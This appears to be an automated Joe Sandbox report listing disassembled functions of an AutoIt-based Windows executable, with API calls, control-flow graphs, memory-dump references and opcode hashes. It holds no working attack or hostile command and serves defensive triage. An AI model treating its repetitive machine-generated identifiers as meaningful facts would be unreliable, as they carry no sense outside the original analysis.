                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                                                                                  • API String ID: 0-2838938394
                                                                                                                                                  • Opcode ID: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                                                                                  • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                                                                                                  • Opcode Fuzzy Hash: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                                                                                  • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                                                                                                  Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 48322524-0
                                                                                                                                                  • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                  • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                                                                                                  • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                  • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                                                                                                  Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                                                                                  • timeGetTime.WINMM ref: 00410D16
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                                                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                                                                                  • DestroyWindow.USER32 ref: 00410F06
                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00445C60
                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                                                                                                  • API String ID: 4212290369-1082885916
                                                                                                                                                  • Opcode ID: e78c3e333774d1b2a91a7bd1afa08df1fd288dd7c662dbc61be51d9d50ac89e9
                                                                                                                                                  • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                                                                                                  • Opcode Fuzzy Hash: e78c3e333774d1b2a91a7bd1afa08df1fd288dd7c662dbc61be51d9d50ac89e9
                                                                                                                                                  • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                                                                                                  Function 00A98550 Relevance: 21.5, APIs: 14, Instructions: 544COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFreeLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1762890227-0
                                                                                                                                                  • Opcode ID: fe6163557088461ac8e57a8976fe6ee8073fd03379c903709ad49e60b96d8816
                                                                                                                                                  • Instruction ID: cfecfdeb2dbcead49c9ce7fb68205a97d9f78326815ef50b8a4bb06b99cdcf4a
                                                                                                                                                  • Opcode Fuzzy Hash: fe6163557088461ac8e57a8976fe6ee8073fd03379c903709ad49e60b96d8816
                                                                                                                                                  • Instruction Fuzzy Hash: 71F1E731B1D340AECE3657684C09B7A3AE06F73B60F5C478AE5559A0F2DE6D8C09D236
                                                                                                                                                  Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1130 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1143 46920b-469212 call 469734 1130->1143 1144 4692b8-4692bf call 469734 1130->1144 1149 4692c1-4692c3 1143->1149 1150 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1143->1150 1144->1149 1151 4692c8 1144->1151 1152 46952a-46952b 1149->1152 1154 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1150->1154 1151->1154 1157 469548-469558 call 405211 1152->1157 1189 469390-4693ab call 468fa5 1154->1189 1190 469389-46938b 1154->1190 1193 4693b1-4693b9 1189->1193 1194 46943d-469449 call 4253a6 1189->1194 1190->1152 1195 4693c1 1193->1195 1196 4693bb-4693bf 1193->1196 1201 46945f-469463 1194->1201 1202 46944b-46945a DeleteFileW 1194->1202 1198 4693c6-4693e4 call 404f0b 1195->1198 1196->1198 1206 4693e6-4693eb 1198->1206 1207 46940e-469424 call 468953 call 424863 1198->1207 1204 469505-469519 CopyFileW 1201->1204 1205 469469-4694f2 call 4240bb call 4699ea call 468b06 1201->1205 1202->1152 1209 46952d-469543 DeleteFileW call 4698a2 1204->1209 1210 46951b-469528 DeleteFileW 1204->1210 1205->1209 1226 4694f4-469503 DeleteFileW 1205->1226 1211 4693ee-469401 call 4690dd 1206->1211 1223 469429-469434 1207->1223 1209->1157 1210->1152 1221 469403-46940c 1211->1221 1221->1207 1223->1193 1225 46943a 1223->1225 1225->1194 1226->1152
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                                                                                    • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00469234
                                                                                                                                                    • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00469247
                                                                                                                                                  • _wcscat.LIBCMT ref: 0046925A
                                                                                                                                                  • __wsplitpath.LIBCMT ref: 0046927F
                                                                                                                                                  • _wcscat.LIBCMT ref: 00469295
                                                                                                                                                  • _wcscat.LIBCMT ref: 004692A8
                                                                                                                                                    • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                                                                                    • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                                                                                                  • _wcscmp.LIBCMT ref: 004691EF
                                                                                                                                                    • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                                                                                    • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 004694C5
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1500180987-0
                                                                                                                                                  • Opcode ID: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
                                                                                                                                                  • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                                                                                                  • Opcode Fuzzy Hash: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
                                                                                                                                                  • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                                                                                                                                                  Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                  • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                                                                                  • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                                                                                                  • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                                                                                  • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                                                                                                                                                  Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                  • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                                                                                  • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                                                                                                  • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                                                                                  • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                                                                                                                                                  Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1296 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1313 43e8b1-43e8cc RegQueryValueExW 1296->1313 1314 4071b6-4071d3 call 405904 * 2 1296->1314 1315 43e943-43e94f RegCloseKey 1313->1315 1316 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1313->1316 1315->1314 1318 43e955-43e959 1315->1318 1330 43e92b-43e931 1316->1330 1331 43e90f-43e929 call 407bcc 1316->1331 1321 43e95e-43e984 call 4079f2 * 2 1318->1321 1336 43e986-43e994 call 4079f2 1321->1336 1337 43e9a9-43e9b6 call 422bfc 1321->1337 1334 43e933-43e940 call 420e2c * 2 1330->1334 1335 43e941 1330->1335 1331->1330 1334->1335 1335->1315 1336->1337 1348 43e996-43e9a7 call 422d8d 1336->1348 1346 43e9b8-43e9c9 call 422bfc 1337->1346 1347 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1337->1347 1346->1347 1356 43e9cb-43e9db call 422d8d 1346->1356 1347->1314 1358 43ea1c-43ea1d 1347->1358 1348->1358 1356->1347 1358->1321
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                                                                                    • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                                                                                                  • _wcscat.LIBCMT ref: 0043E9A0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                  • API String ID: 2673923337-2727554177
                                                                                                                                                  • Opcode ID: 3dc34742f8a7bc767ebd921b8f511a1c2b55e9980e44eb1467a7df652b5eb101
                                                                                                                                                  • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                                                                                                  • Opcode Fuzzy Hash: 3dc34742f8a7bc767ebd921b8f511a1c2b55e9980e44eb1467a7df652b5eb101
                                                                                                                                                  • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                                                                                                                                                  Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1366 403633-403681 1368 4036e1-4036e3 1366->1368 1369 403683-403686 1366->1369 1368->1369 1372 4036e5 1368->1372 1370 4036e7 1369->1370 1371 403688-40368f 1369->1371 1376 4036ed-4036f0 1370->1376 1377 43d0cc-43d0fa call 411070 call 411093 1370->1377 1373 403695-40369a 1371->1373 1374 40374b-403753 PostQuitMessage 1371->1374 1375 4036ca-4036d2 DefWindowProcW 1372->1375 1379 4036a0-4036a2 1373->1379 1380 43d154-43d168 call 462527 1373->1380 1381 403711-403713 1374->1381 1382 4036d8-4036de 1375->1382 1383 4036f2-4036f3 1376->1383 1384 403715-40373c SetTimer RegisterWindowMessageW 1376->1384 1412 43d0ff-43d106 1377->1412 1388 403755-403764 call 4044a0 1379->1388 1389 4036a8-4036ad 1379->1389 1380->1381 1405 43d16e 1380->1405 1381->1382 1385 4036f9-40370c KillTimer call 40443a call 403114 1383->1385 1386 43d06f-43d072 1383->1386 1384->1381 1390 40373e-403749 CreatePopupMenu 1384->1390 1385->1381 1398 43d074-43d076 1386->1398 1399 43d0a8-43d0c7 MoveWindow 1386->1399 1388->1381 1394 4036b3-4036b8 1389->1394 1395 43d139-43d140 1389->1395 1390->1381 1403 43d124-43d134 call 462d36 1394->1403 1404 4036be-4036c4 1394->1404 1395->1375 1401 43d146-43d14f call 457c36 1395->1401 1407 43d097-43d0a3 SetFocus 1398->1407 1408 43d078-43d07b 1398->1408 1399->1381 1401->1375 1403->1381 1404->1375 1404->1412 1405->1375 1407->1381 1408->1404 1413 43d081-43d092 call 411070 1408->1413 1412->1375 1416 43d10c-43d11f call 40443a call 40434a 1412->1416 1413->1381 1416->1375
                                                                                                                                                  APIs
                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0040373E
                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                  • String ID: TaskbarCreated$%I
                                                                                                                                                  • API String ID: 129472671-1195164674
                                                                                                                                                  • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                                                                                  • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                                                                                                  • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                                                                                  • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                                                                                                                                                  Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00403A76
                                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                                                                                    • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                    • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                    • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                    • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                    • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                    • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                    • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
